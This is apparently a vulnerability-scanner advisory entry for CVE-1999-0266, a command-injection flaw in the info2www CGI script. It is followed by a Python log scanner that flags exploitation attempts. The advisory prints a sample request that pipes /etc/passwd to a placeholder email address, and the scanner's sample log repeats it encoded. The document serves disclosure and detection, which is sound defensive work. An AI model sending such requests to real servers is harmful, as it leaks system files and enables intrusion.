| VID | 21055 |
| Severity | 40 |
| Port | 80, ... |
| Protocol | TCP |
| Class | CGI |
| Detailed Description |
The 'info2www' CGI is installed. This CGI script converts GNU Info nodes into HTML for viewing over the web. It has a well-known security flaw that lets anyone execute arbitrary commands with the privileges of the HTTP daemon (root or nobody). Several different versions of this program exist, some vulnerable and some not. Generally, if the script calls open() without filtering shell metacharacters out of the HTTP request, it is vulnerable. It is therefore possible to display any file on systems where info2www is world-executable by sending something like:
http://target/cgi-bin/info2www?"(../../../bin/mail your@email < /etc/passwd|)" |
| Recommendation |
Paranoid sites should disable all CGI scripts until they have been thoroughly audited for security vulnerabilities. Versions prior to 1.2 of info2www should be considered vulnerable, as well as info2html, infogate, and other derivative works. |
| Related URL | CVE-1999-0266 (CVE) |
| Related URL | 1995 (SecurityFocus) |
| Related URL | 1732 (ISS) |
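To audit a server for the request pattern in the Detailed Description, the following added example (not part of the original record or of info2www) scans web access logs for requests to info2www, info2html or infogate whose query string carries shell metacharacters after percent-decoding. The log lines are constructed samples, and the Common Log Format layout and the benign `(emacs)Top` request shape are assumptions.

```python
import re
from urllib.parse import unquote

# CGI names the record lists as vulnerable or derivative.
SCRIPTS = ("info2www", "info2html", "infogate")
# Characters a shell, or an open() call that honours pipes, treats specially.
# Parentheses are left out: Info node references such as (emacs)Top use them
# (assumed benign request shape).
META = set("|;&`$<>\n\"'")
# Request field of a Common Log Format line: "METHOD target PROTOCOL".
# The greedy match tolerates spaces and quotes logged inside the target.
REQUEST = re.compile(r'"[A-Z]+ (?P<target>.*) HTTP/[0-9.]+"')

# Constructed sample log; addresses come from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] '
    '"GET /cgi-bin/info2www?(emacs)Top HTTP/1.0" 200 5120',
    '192.0.2.66 - - [01/Jan/2000:10:02:13 +0000] '
    '"GET /cgi-bin/info2www?%22(../../../bin/mail%20your@email%20%3C%20'
    '/etc/passwd%7C)%22 HTTP/1.0" 200 312',
    '192.0.2.10 - - [01/Jan/2000:10:03:40 +0000] '
    '"GET /cgi-bin/search?q=a%7Cb HTTP/1.0" 200 900',
    '192.0.2.66 - - [01/Jan/2000:10:05:02 +0000] '
    '"GET /cgi-bin/info2html?(dir)Top%7C HTTP/1.0" 200 0',
]


def suspicious_requests(log_lines):
    """Return (line_number, script, metacharacters) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        path, _, query = match.group("target").partition("?")
        segments = unquote(path).lower().split("/")
        script = next((s for s in segments if s in SCRIPTS), None)
        if script is None:
            continue
        found = sorted(META & set(unquote(query)))
        if found:
            hits.append((number, script, "".join(found)))
    return hits


if __name__ == "__main__":
    for number, script, chars in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {script} query contains {chars!r}")
```

A hit with status 200 warrants checking which info2www version is installed; the Recommendation treats versions prior to 1.2 and the derivative scripts as vulnerable.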